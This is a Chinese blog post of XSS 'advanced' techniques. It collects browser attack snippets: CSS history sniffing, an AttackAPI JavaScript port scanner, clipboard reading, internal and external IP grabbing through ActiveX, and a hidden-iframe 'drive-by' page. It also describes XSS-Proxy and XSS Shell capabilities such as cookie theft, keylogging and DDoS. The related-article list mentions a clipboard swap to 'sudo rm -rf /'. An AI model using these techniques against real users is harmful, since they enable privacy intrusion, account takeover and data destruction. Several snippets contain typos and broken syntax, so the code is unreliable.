XSS 专题二 XSS 提高

最新推荐文章于 2024-04-23 09:59:06 发布
最新推荐文章于 2024-04-23 09:59:06 发布
阅读量1.2k 收藏
点赞数
分类专栏: XSS 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wcc526/article/details/13021499
版权

一.JavaScript/CSS history hack

<html>

<body>
<h3> Visited </h3>
<ul id="visited"> </ul>
<h3> Not Visited </h3>
<ul id="notvisited"> </ul>

<script>
var websites=[
"http://www.baidu.com/"
];
for(var i=0; i < websites.length;i++){
    var link=document.createElement("a");
    link.id="id"+i;
    link.href=websites[i];
    link.innerHTML=websites[i];
    document.write('<style>');
    document.write('#id'+i+":visited {color:#FF0000;}");
    document.write('</style>');
    document.body.appendChild(link);
    var color=document.defaultView.getComputedStyle(link,null).getPropertValue("color");
    document.body.removeChild(link);
    if(color == "rgb(255,0,0)"){
      var item=document.createElement('li');
      item.appendChild(link);
      document.getElementById('visited').appendChild(item);
    }else
    {
      var item=document.createElement('li');
      item.appendChild(link);
      document.getElementById('notvisited').appendChild(item);
    }
}
</script>
</body>

</html>

二.JavaScript 实现端口扫描

<html>

<body>
<form>
<label for="target">target</label><br/>
<input type="text" name="target" value="
www.gnucitizen.org"/><br/>
<label for="port">port</label><br/>
<input type="text" name="port" value="80"/><br/>
<p>you can use sequence as well 80,81,8080</p>
<label for="timeout">timeout</label><br/>
<input type="text" name="timeout" value="1000"/><br/>
<label for="result">result</label><br/>
<textarea id="result" name="result" rows="7" cols="50"></textarea><br/>
<input class="button" type="button" value="scan" onClick="javascript:scan(this.form)"/>
</form>

<script>
var AttackAPI = {
    version: 0.1,
    author: Petko Petkov (architect),
    homepage: http://www.gnucitizen.org};

AttackAPI.PortScanner = {};
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) {
    var timeout = (timeout == null)?100:timeout;
    var img = new Image();
   
    img.onerror = function () {
        if (!img) return;
        img = undefined;
        callback(target, port, open);
    };
   
    img.onload = img.onerror;
    img.src = http:// + target + : + port;
   
    setTimeout(function () {
        if (!img) return;
        img = undefined;
        callback(target, port, closed);
    }, timeout);
};
AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout)
{
    for (index = 0; index < ports.length; index++)
        AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout);
};
</script>
<script>
var result = document.getElementById(result);
var callback = function (target, port, status) {
    result.value += target + : + port + + status + " ";
};
var scan = function (form) {
    AttackAPI.PortScanner.scanTarget(callback, form.target.value, form.port.value.split(,), form.timeout.value);
};
</script>
</body>
</html>

三.JavaScript 查看剪贴板内容

对于IE有效,Firefox无效

<html>

<body>
<form action="test.php" method="post" id="test">
    <div id="someData">
        <textarea cols="40" rows="4" name="test">
        </textarea>
    </div>
    <input type="button" value="copy to clipboard" οnclick="setClipboard()">
    <input type="button" value="look clipboard" οnclick="readClipboard()">
    <input type="button" value="clear clipboard" οnclick="window.clipboardData.clearData('text');">
</form>
<script>
function readClipboard(){
    alert(window.clipboardData.getData('Text'));
}
function setClipboard(){
    var t=document.getElementById("someData").innerText;
    window.clipboardData.setData('text',t);
}
</script>
</body>
</html>

四.获取内网IP地址

<html>

<body>
<script>
function GetLocalIP(){
    var obj=null;
    var rslt="";
    try
    {
        obj=new ActiveXObject("rcbdyctl.Setting");
        rslt=obj.GetIPAddress;
        obj=null;
    }
    catch(e)
    {}
    return rslt;
}
document.write("Your IP is : "+GetLocalIP())
</script>
</body>
</html>

五.获取外网IP地址

<html>
<body>
<script>
    xml=new ActiveXObject("Microsoft.XMLHTTP");
    xml.open("GET","http://www.ip138.com/ip2city.asp",fasle);
    xml.send();
    kk=xml.ResponseText;
    i=kk.indexOf("[");
    ie=kk.indexOf("]");
    ip=kk.substring(i+1,ie);
    document.write("Your IP :"+ip);
</script>
</body>
</html>

六.网页挂马

<html>
<body>
<script>
    document.write("<iframe src=http://www.baidu.com width=100% height=100% ></iframe>")
</script>
</body>
</html>

七.Fiddler

Fiddler是最强大最好用的Web调试工具之一,它能记录所有客户端和服务器的http和https请求,允许你监视,设置断点,甚至修改输入输出数据. 使用Fiddler无论对开发还是测试来说,都有很大的帮助

八.XSS-Proxy

http://xss-proxy.sourceforge.net/

修改code_server和server_port两个参数,code_server是本地的xss-proxy server服务器域名

关于xss2.js

(1)showDoc()

  这个函数的功能就是加载当前用户浏览器窗口的内容到iframe,然后将iframe的内容转换成一个不大于2048个字节(URL长度限制)的url,并将此url作为对xss-proxy请求。

(2)scriptRequest()

        每12秒运行一次,用于与xss-proxy server的交互,包括一些javascript evaluate results。

(3)reportError()

        报告错误信息,如Dom对象访问错误等。

九.XSS Shell

XSS Shell一个windows环境下的XSS攻击平台。下载地址为:http://www.portcullis-security.com/tools/free/XSSShell039.zip
利用XSS Shell,攻击者可以轻松攻击存在XSS漏洞的网站的用户。目前可以实施的攻击包括但不限于:
1、获取用户cookie;
2、获取用户当前页面内容;
3、弹出窗口;
4、执行JS代码;
5、弹出与用户交互窗口;
6、获取键盘日志(测试中未成功);
7、获取鼠标日志(测试中未成功);
8、获取剪贴板(仅限IE);
9、获取内部IP(仅支持Mozilla* + JVM)
10、获取用户浏览历史;
11、Make a request with victim credentials (目前不了解)
12、DDoS;
13、耗尽用户计算机CPU资源。

http://labs.portcullis.co.uk/tools/xss-shell/ 下载地点

十.AttackAPI

   JavaScript 框架

下载地址http://www.gnucitizen.org/blog/attackapi/

http://code.google.com/p/attackapi/

1.提取并扫描当前已经安装的Firefox扩展

2.检测一个用户是否已经登录某站点

3.扫描客户端浏览历史

 或者

Anehta XSS利用工具在

http://code.google.com/p/anehta/downloads/list






[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSSXSS靶场9道题目、如何防御XSS。希望您喜欢~
奇技淫巧之粘贴板攻击
sievr的博客
03-25 717
粘贴板攻击,顾名思义,通过粘贴板攻击目标。(可搭配xss使用) 相信大家在某大型博客上复制东西,奇复制的内容后都会加上下面这串字符吧 ———————————————— 版权声明:本文为博主的原创文章,遵循****版权协议,转载请附上原文出处链接及本声明。 其原理就是通过js实现 而今天,我们要做的就是,自定义这一段内容,你可以给他改成任何你想要的命令或者代码。 比如,你从某搜索引擎上搜到的答案是 ping google.com,一条人畜无害的命令,结果粘贴出来的却是sudo rm -rf /,你看都没看就
ATTACKAPI
09-06
AttackAPI provides simple and intuitive programmable interface for composing attack vectors with JavaScript and other client and server related technologies. This is the 2.x branch which among other improvements introduces better interaction with the attack subroutines.AttackAPI is standard part of many public and private security related projects hosted on GNUCITIZEN and other organizations. This library may be treated as open source (GPLv2) project. As such, feel free to extend upon it. Keep in mind, that AttackAPI may only be used for experimental and demonstration purposes. GNUCITIZEN disclaims any responsibility for your own actions.
跨站平台XSS SHELL使用方法
weixin_33968104的博客
03-24 367
理解xss shell是什么之前,让我们一起回顾一下一些基本的xss(跨站脚本),xss是最常见的一个漏洞,存在于今天许多的web应用程序。xss是***者试图通过web应用程序执行恶意脚本的技术,***者通过突破同源策略的web应用程序。***者一旦能够找到一个存在xss漏洞的web应用程序,他可以利用这个漏洞只想不同类型的***其中一些是: 窃取凭据(Stealing C...
【Burpsuite靶场】XSS
2302_79800344的博客
04-23 1746
基于Burpsuite靶场,深度学习XSS三种类型的各类情况。
XSS专题
goddemon
09-08 7068
①钓鱼页面+xss结合使用 典型 cs+xss组合拳 //① <script>alert(url)</script> //② <script src="http://192.168.56.132/pkxss/xfish/fish.php"></script> //③html注入钓鱼 <script>alert(<html><head><title>login</title></head>&
安全专题分享-XSS
07-22
最常见的安全问题之一XSS,如何的防患和开发技巧 XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,...
网络攻防-XSS跨站脚本攻击详解及其防范
10-31
使用场景及目标:帮助IT专业人员深入了解XSS的工作机制,提高XSS的认识水平,并掌握具体的防护手段,加强web应用安全性,减少遭受XSS攻击的可能性。 其他说明:阅读本文有助于加深对于现代web应用程序中普遍存在的...
第五第六式web安全之xss漏洞、命令执行漏洞专题.pdf
06-22
注释在JavaScript中起到了重要作用,可以用来解释代码或提高代码的可读性,而不影响代码执行。单行注释以“//”开头,多行注释则以“/*”开始,以“*/”结束。文档还指出,创建变量时应使用“var”关键字进行声明。 ...
精通JavaScript攻击框架:AttackAPI(下)
Mr.ROBOT
12-01 502
宇文 多年来客户端安全一直未引起人们的足够重视,但是如今情况发生了急剧转变,客户端安全已经成为信息安全领域的焦点之一。Web恶意软件、AJAX蠕虫、浏览历史暴破、登录检测、傀儡控制技术网络端口扫描以及浏览器劫持等各种技术只是安全研究人员地下实验室的部分技术,但是已经带来了非常大的影响。 一种类型的安全专业浮现并变成主流利用机制时,供应厂商和个人就会开始发行框架和自动工具,来处理工具和测
搜集的一些安全工具集合
热门推荐
cogbee的专栏
01-18 1万+
精通JavaScript攻击框架:AttackAPI(上)
Mr.ROBOT
12-01 2767
宇文 多年来客户端安全一直未引起人们的足够重视,但是如今情况发生了急剧转变,客户端安全已经成为信息安全领域的焦点之一。Web恶意软件、AJAX蠕虫、浏览历史暴破、登录检测、傀儡控制技术网络端口扫描以及浏览器劫持等各种技术只是安全研究人员地下实验室的部分技术,但是已经带来了非常大的影响。 一种类型的安全专业浮现并变成主流利用机制时,供应厂商和个人就会开始发行框架和自动工具,来处理工具和测
AttackApi
agent_peakey的专栏
04-02 3116
AttackAPI 1.      概念 AttackApi是一个用于XSS攻击的JS库,你不用再写那些繁琐的涉及到各种标签各种dom各种系统各种浏览器的基础代码,直接调用AttackAPI为你封装好的那些函数即可。   2.      使用 AttackApi的使用极其简单,主要分2部: (1)    注入attackApi代码 在有XSS漏洞的地方插入以下代码: ”//加载At
在WPF中使用ItemsControl控件来实现线状图控件
04-13
在WPF中使用ItemsControl控件来实现线状图控件
语音合成_变分自编码器_对抗学习_端到端文本转语音技术_研究_1744171913.zip
04-13
语音合成_变分自编码器_对抗学习_端到端文本转语音技术_研究_1744171913.zip
基于ThinkPHP5.1的高效多商户在线客服系统架构与优化
最新发布
04-13
内容概要:本文详细介绍了基于ThinkPHP5.1框架构建的多商户在线客服系统的源码和技术实现细节。系统采用动态域名绑定实现商户隔离,数据库分表确保数据安全,机器人聊天模块使用三级匹配策略提高应答效率,地图统计功能利用IP库和ECharts展示客户分布情况,服务器优化方面通过缓存策略和流量控制提升性能。此外,还包括了自适应布局、离线消息机制以及APP封装等内容。 适合人群:有Web开发经验的技术人员,尤其是对ThinkPHP框架有一定了解的开发者。 使用场景及目标:适用于需要搭建高性能、低成本多商户在线客服系统的公司或个人。主要目标是帮助开发者理解和掌握如何通过合理的架构设计和技术手段,在有限的硬件条件下实现高效的客户服务。 其他说明:文中提供了大量实际代码片段作为参考,有助于读者更好地理解具体实现方法。同时强调了性能优化的重要性,如缓存使用、数据库设计等方面的经验分享。
三菱PLC FX3U与松下伺服四轴控制系统的功能块设计及应用
04-13
内容概要:本文详细介绍了三菱PLC FX3U与松下伺服组成的四轴控制系统的设计与实现。硬件部分由FX3U-48MT本体和两个1PG定位模块构成,每个1PG模块连接两个松下A5伺服,形成四轴系统。软件部分通过功能块(FB)进行模块化设计,涵盖JOG控制、回零、定位等功能。每个功能块内部实现了复杂的控制逻辑,如加减速曲线、方向控制等,并通过ST语言编写。此外,MCGS触摸屏用于参数配置和监控,支持CSV文件保存配方,通过MODBUS RTU协议与PLC通信。电气图纸和IO表详细记录了各信号的连接和功能,便于现场施工和维护。 适合人群:从事工业自动化控制领域的工程师和技术人员,尤其是熟悉三菱PLC和松下伺服系统的用户。 使用场景及目标:适用于需要实现多轴精密控制的工业应用场景,如数控机床、自动化生产线等。目标是提供一种高效、易维护的多轴控制系统解决方案。 其他说明:文中提供了详细的代码示例和硬件配置说明,有助于理解和实施该项目。同时,强调了良好的注释习惯和模块化设计思想,提高了系统的可移植性和可维护性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值